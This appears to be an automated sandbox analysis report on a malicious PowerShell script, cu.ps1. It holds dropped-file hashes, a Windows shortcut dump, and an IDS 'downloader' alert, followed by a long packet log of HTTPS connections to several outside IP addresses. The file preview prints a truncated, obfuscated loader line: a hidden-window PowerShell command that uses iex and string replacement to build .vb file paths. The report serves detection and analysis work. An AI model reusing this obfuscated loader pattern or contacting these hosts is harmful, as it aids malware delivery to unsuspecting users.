                                                                          SHA-256:6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
                                                                          SHA-512:1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.722661052957014
                                                                          Encrypted:false
                                                                          SSDEEP:96:tw/mCKQVkLgkvhkvCCtg422XDHL422zDHF:tw/8cqsg4l43
                                                                          MD5:D3893E8F15702976573D241FFA55B71B
                                                                          SHA1:11DCEF90B4136D10DE72A13D051E407BD295171D
                                                                          SHA-256:7DEEE018D2A91F02B31B53DB8824472A59B1441A477AEBB0E55BF241AFBD6FA7
                                                                          SHA-512:1FA5131A47FD7E011D088E20425FA54F14169E3B6A53E7075999629402DE8400AF08ACACDCECC5C933E276D30638821A38970A6EFB85AD5FC960199A5B9043D3
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....'GDj.../-...F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....&*..F.._....F......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.L..........................=...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EWsG.Y.L..............................R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.L..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.L..........................OP..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.L....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.L....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.L................
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.722661052957014
                                                                          Encrypted:false
                                                                          SSDEEP:96:tw/mCKQVkLgkvhkvCCtg422XDHL422zDHF:tw/8cqsg4l43
                                                                          MD5:D3893E8F15702976573D241FFA55B71B
                                                                          SHA1:11DCEF90B4136D10DE72A13D051E407BD295171D
                                                                          SHA-256:7DEEE018D2A91F02B31B53DB8824472A59B1441A477AEBB0E55BF241AFBD6FA7
                                                                          SHA-512:1FA5131A47FD7E011D088E20425FA54F14169E3B6A53E7075999629402DE8400AF08ACACDCECC5C933E276D30638821A38970A6EFB85AD5FC960199A5B9043D3
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....'GDj.../-...F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....&*..F.._....F......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.L..........................=...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EWsG.Y.L..............................R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.L..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.L..........................OP..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.L....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.L....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.L................
                                                                          File type:ASCII text, with very long lines (825), with no line terminators
                                                                          Entropy (8bit):5.334341278487085
                                                                          TrID:
                                                                            File name:cu.ps1
                                                                            File size:825 bytes
                                                                            MD5:ffe670c96b95f411565aad0ed1bd8826
                                                                            SHA1:2069824f37cedac9e4ac4fdd68cbdf9903469d25
                                                                            SHA256:981751d5f3e0745c63ebbb34a2007ad61bc16c407f57173cb5f315e9ec9e5972
                                                                            SHA512:34ba588c5b27e9f6852155d34a217d7a69b8e012fb96c12c0b2bda0ac0968de95687737abdef378fef9499d182085ab751d1c292aae450f750f3709346d54f0d
                                                                            SSDEEP:24:XaMNik5MNAVjWIOLWH1LT11QWAa6Kzkuzoo:n3KImWh1YKzkeoo
                                                                            TLSH:3D014149915A9AF35A90F69620C86D3E3235C60AA1FD00B3FAF4464714BDA7D0AC2D77
                                                                            File Content Preview:powershell -win hidden $njqoyt=iex($('[Environment]::GetEq9ps'''.Replace('q9p','nvironmentVariable(''public'') + ''\\ik473a.vb')));$flol=iex($('[Environment]::GetEq9ps'''.Replace('q9p','nvironmentVariable(''public'') + ''\\tq5.vb')));function getit([strin
                                                                            Icon Hash:3270d6baae77db44
Timestamp                        SID      Signature                                         Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-12-05T10:39:40.070592+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H  3         192.168.2.9  49712        184.171.244.231  443        TCP
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 5, 2024 10:39:25.030869961 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:25.030927896 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:25.031007051 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:25.041688919 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:25.041718006 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:26.521923065 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:26.522000074 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:26.550317049 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:26.550353050 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:26.550867081 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:26.572042942 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:26.615324974 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.237313032 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.237344027 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.237430096 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.237452984 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.286597967 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.286618948 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.333475113 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.350109100 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.350131035 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.350136995 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.350184917 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.350229025 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.350236893 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.395981073 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.448831081 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.448842049 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.448944092 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.448980093 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.449021101 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.473797083 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.473807096 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.473828077 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.473859072 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.473913908 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.499125957 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.499140024 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.499198914 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.499247074 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.499253035 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.542119980 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.542162895 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.542237997 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.542249918 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.583482027 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.628796101 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.628807068 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.628832102 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.628891945 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.628942013 CET  49709        443        192.168.2.9    93.95.216.175
Dec 5, 2024 10:39:27.642954111 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.642961979 CET  443          49709      93.95.216.175  192.168.2.9
Dec 5, 2024 10:39:27.642985106 CET  443          49709      93.95.216.175  192.168.2.9
                                                                            Dec 5, 2024 10:39:27.643027067 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.643083096 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.661907911 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.661916018 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.662000895 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:27.662009001 CET4434970993.95.216.175192.168.2.9
                                                                            Dec 5, 2024 10:39:27.666394949 CET49709443192.168.2.993.95.216.175
                                                                            Dec 5, 2024 10:39:28.070544004 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:28.070596933 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:28.070672989 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:28.071005106 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:28.071021080 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.331828117 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.331927061 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.355475903 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.355506897 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.355901003 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.357979059 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.399333000 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.785850048 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.833489895 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.833512068 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.880379915 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.905942917 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.905955076 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.905992985 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906022072 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.906039953 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906052113 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906069040 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.906090021 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:29.906104088 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:29.958487034 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.004580975 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004595041 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004623890 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004688978 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.004694939 CET4434971091.193.42.13192.168.2.9
                                                                            Dec 5, 2024 10:39:30.004724026 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.004748106 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:30.028963089 CET49710443192.168.2.991.193.42.13
                                                                            Dec 5, 2024 10:39:32.455209017 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:32.455260038 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:32.455408096 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:32.458355904 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:32.458372116 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.724523067 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.724692106 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:33.726996899 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:33.727010965 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.727329016 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:33.736076117 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:33.779335022 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:34.181077957 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:34.181169987 CET44349711184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:34.181227922 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:34.184232950 CET49711443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342300892 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342340946 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:38.342436075 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342749119 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:38.342762947 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:39.602643013 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:39.604751110 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:39.604789019 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:40.070583105 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:40.070653915 CET44349712184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:40.070724964 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:40.071738958 CET49712443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:44.213030100 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:44.213057041 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:44.213141918 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:44.213395119 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:44.213403940 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.634685993 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.634810925 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:45.636596918 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:45.636605978 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.639935970 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:45.640912056 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:45.687330961 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:46.172189951 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:46.172363043 CET44349713148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:46.172444105 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:46.172753096 CET49713443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:50.182630062 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:50.182673931 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:50.182758093 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:50.182955980 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:50.182969093 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.442277908 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.443727016 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:51.443739891 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.901973009 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.902060032 CET44349714184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:39:51.902127028 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:51.902606964 CET49714443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:39:55.916816950 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:55.916865110 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:55.916946888 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:55.917171001 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:55.917181015 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.318557024 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.319689035 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:57.319710970 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.866288900 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.866463900 CET44349716148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:39:57.866575956 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:39:57.866996050 CET49716443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:01.867847919 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:01.867894888 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:01.868014097 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:01.868207932 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:01.868218899 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.129390001 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.130868912 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:03.130889893 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.590732098 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.590802908 CET44349717184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:03.590856075 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:03.591193914 CET49717443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:07.588071108 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:07.588107109 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:07.588200092 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:07.588478088 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:07.588501930 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:08.986845016 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:08.988116980 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:08.988131046 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:09.532922029 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:09.533138037 CET44349719148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:09.533252001 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:09.558137894 CET49719443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:13.617770910 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:13.617827892 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:13.618056059 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:13.618352890 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:13.618371964 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:14.880326986 CET44349720184.171.244.231192.168.2.9
